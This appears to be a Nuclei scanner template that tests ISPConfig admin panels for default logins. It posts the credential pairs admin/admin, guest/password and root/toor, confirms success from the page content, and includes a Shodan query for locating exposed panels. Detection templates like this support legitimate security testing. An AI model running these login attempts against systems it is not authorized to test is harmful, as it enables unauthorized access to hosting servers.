id: ispconfig-admin-default-login
info:
  name: ISPConfig Admin - Default Password
  author: pussycat0x
  severity: high
  description: |
    ISPConfig Admin Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
  metadata:
    runzero-match: any(each(service["html.titles"]), {# matches "(?i)ispconfig"})
    max-request: 9
    shodan-query: http.title:"ispconfig"
    verified: true
  tags: default-login,ispconfig,vuln
http:
  - attack: pitchfork
    host-redirects: true
    matchers:
      - condition: and
        part: body_3
        type: word
        words:
          - Tools
          - Websites
      - status:
          - 200
        type: status
    matchers-condition: and
    payloads:
      password:
        - admin
        - password
        - toor
      username:
        - admin
        - guest
        - root
    raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Connection: close
        Referer: {{RootURL}}/login/

        username={{username}}&password={{password}}&s_mod=login&s_pg=index
      - |
        GET /sites/web_vhost_domain_list.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}/index.php
    stop-at-first-match: true
